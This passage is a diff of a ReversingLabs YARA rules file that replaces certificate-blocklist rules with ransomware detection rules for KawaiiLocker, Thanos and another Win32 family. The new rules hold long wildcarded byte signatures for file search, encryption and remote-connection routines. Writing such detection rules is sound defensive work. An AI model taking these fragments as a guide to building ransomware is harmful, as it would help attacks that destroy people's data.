+            ?? ?? ?? ?? 50 FF D6 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 68 ?? ?? ?? ?? FF D6 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8B F0 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ??
+            ?? ?? 8B F8 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? 56 8D 85 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15
+        }
+		$encrypt_files_p2 = {
+            8D 45 ?? 50 57 68 ?? ?? ?? ?? 56 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ??
+            57 50 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
+            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? 8B 35 ?? ?? ??
+            ?? 8D 4D ?? 6A ?? 51 FF 75 ?? FF 75 ?? 50 FF D6 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83
+            C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 50 8D 85 ?? ?? ?? ??
+            50 FF 75 ?? FF D6 8B 45 ?? 50 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? FF D0 FF 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BF ?? ??
+            ?? ?? 89 45 ?? 8D 57 ?? 8B CF D3 E8 A8 ?? 0F 84 ?? ?? ?? ?? 8D 47 ?? C7 45 ?? ?? ??
+            ?? ?? 66 89 45 ?? 33 F6 33 C0 50 50 50 50 50 68 ?? ?? ?? ?? 50 66 89 45 ?? 8D 45 ??
+            50 FF 15 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ??
+            ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 66 8B 85 ?? ?? ?? ?? 66 3B 45 ?? 75 ?? 66 8B 85 ?? ?? ?? ?? 66 3B 45 ?? B8 ?? ??
+            ?? ?? 0F 44 F0 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ??
+            ?? ?? ?? 83 EF ?? 8B 45 ?? 0F 89 ?? ?? ?? ?? 0F 57 C0 C7 85
+        }
+		$encrypt_files_p3 = {
+            0F 29 85 ?? ?? ?? ?? 0F 29 85 ?? ?? ?? ?? 0F 29 85 ?? ?? ?? ?? 0F 29 85 ?? ?? ?? ??
+            0F 29 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 68
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 68
+            ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 ?? ??
+            ?? ?? B8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 6A ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
+            FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ??
+            6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85
+            C0 74 ?? FF 75 ?? 8B 35 ?? ?? ?? ?? FF D6 FF 75 ?? FF D6 6A ?? FF 15
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Infoware Cloud Limited" and pe.signatures [ i ] . serial == "11:26:13:b7:b5:f6:96:cf:37:76:80:f6:46:3f:cc:8c" and 1566518400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_B3F906E5E6B2Cf61C5E51Be79B4E8777 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Kawaiilocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects KawaiiLocker ransomware."
 		author = "ReversingLabs"
-		id = "dc826355-bd15-58b3-adcb-55b704f03c0d"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "8c368e2d-3c6f-5c4b-880b-ebdb06dcf901"
+		date = "2020-08-17"
+		modified = "2020-08-17"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4460-L4478"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.KawaiiLocker.yara#L1-L135"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "037e154854c1128fb73d2221c2b7d7211d977492378614fcf4fde959207e34b3"
+		logic_hash = "d86b41ef1c43da55869ad26facd5efdf232277f0e33483690a69a04c4ba8f7da"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
-
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "KawaiiLocker"
+		tc_detection_factor = 5
+		importance = 25
+
+	strings:
+		$search_files = {
+            55 8B EC 51 B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 ?? 51 87 4D ?? 53 56 57 88 4D ?? 89 55
+            ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 ?? E8 ??
+            ?? ?? ?? 8B 55 ?? 80 7C 02 ?? ?? 75 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 4A 8D 45 ?? E8
+            ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F
+            85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B D0 83 CA ?? 3B D0 75 ?? 80 7D ?? ?? 0F 85 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8A 4D
+            ?? 8B 55 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ?? BB ?? ?? ?? ?? FF 75 ?? 68
+            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 13 E8 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? FF 75 ?? 68 ??
+            ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D
+            95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 85 C0 75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ??
+            FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 08 FF 51 ?? 83 C3 ?? 4E 0F 85 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8B C7 83 C8 ?? 3B C7 75 ?? 80 7D ?? ?? 0F 85 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8A 4D
+            ?? 8B 55 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ?? BB ?? ?? ?? ?? FF 75 ?? 68
+            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 13 E8 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? FF 75 ?? 68 ??
+            ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D
+            95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 85 C0 75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ??
+            FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 08 FF 51 ?? 83 C3 ?? 4E 0F 85 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ??
+            E8 ?? ?? ?? ?? C3
+        }
+		$remote_connection = {
+            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? B2
+            ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            45 ?? 50 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 59 E8 ?? ?? ?? ??
+            8D 4D ?? BA ?? ?? ?? ?? 33 C0 E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75
+            ?? 8D 4D ?? BA ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 8D 45 ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45
+            ?? 8B 50 ?? 8B 45 ?? 8B 08 FF 51 ?? 8D 55 ?? 8B 45 ?? 8B 08 FF 51 ?? 8B 45 ?? 8D 55
+            ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? E8 ?? ??
+            ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B C3 8B 55 ?? E8 ?? ?? ?? ??
+            33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+		$encrypt_files = {
+            55 8B EC 6A ?? 6A ?? 6A ?? 53 56 57 BB ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30
+            64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 10 FF 52
+            ?? 8B F0 8B C3 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43
+            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83
+            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B DE 4B 85 DB 7C ?? 43 33 F6 8D 55 ?? 33 C0 E8 ?? ?? ?? ?? 8B 45
+            ?? 8D 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ??
+            ?? ?? 8B 08 FF 51 ?? 8D 4D ?? 8B D6 A1 ?? ?? ?? ?? 8B 38 FF 57 ?? 8B 45 ?? B1 ?? BA
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 46 4B 75 ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 6A ?? E8 ?? ?? ?? ?? 6A ?? E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Accelerate Technologies Ltd" and ( pe.signatures [ i ] . serial == "00:b3:f9:06:e5:e6:b2:cf:61:c5:e5:1b:e7:9b:4e:87:77" or pe.signatures [ i ] . serial == "b3:f9:06:e5:e6:b2:cf:61:c5:e5:1b:e7:9b:4e:87:77" ) and 1594900020 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $search_files and $encrypt_files and $remote_connection
 }
-
-rule REVERSINGLABS_Cert_Blocklist_566Ac16A57B132D3F64Dced14De790Ee : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Thanos : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Thanos ransomware."
 		author = "ReversingLabs"
-		id = "cb2ebbd5-5036-52f6-a064-11609f02309f"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "e607255d-45a6-573d-956e-f6faa2aa7e9f"
+		date = "2021-08-12"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4480-L4496"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Thanos.yara#L1-L106"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "48f4d334614f6c413907d51f4d6312554b13c4f5a3c03070ceba48baa13a8247"
+		logic_hash = "f6bc0c2188a04d2fb2a82a6b6d6cdf7763c32047bec725fe07f01415edf0b4cd"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Thanos"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 FE 01 2B ?? 16 00 13 ?? 11 ?? 2D ?? DD
+            ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 6C 7E ?? ?? ?? ??
+            28 ?? ?? ?? ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 5A 23 ?? ?? ?? ?? ?? ?? ?? ?? 5A 35 ?? 7E ??
+            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 06 08
+            6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 2B ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 7E ??
+            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 2B ?? 17 00 13 ?? 11 ?? 2D ?? 00 06 08
+            6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 00 DE ?? 26 00 00 DE ?? 26 00 00 DE ?? 00 00 00 11
+            ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 3A ?? ?? ?? ?? DE ?? 11 ?? 14 FE 01 13 ?? 11 ?? 2D ?? 11
+            ?? 6F ?? ?? ?? ?? 00 DC 00 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 38
+            ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 0D 00 07 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 2D ?? 07 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D
+            ?? 07 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 07 6F ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 07 6F ?? ?? ?? ?? 6F
+        }
+		$find_files_p2 = {
+            72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 07 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 16 FE 01 2B ?? 16 00 13 ?? 11 ?? 2D ?? 38 ?? ?? ?? ?? 00 00 09 72 ?? ?? ??
+            ?? 17 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 0C 00 00
+            08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 08 6F ??
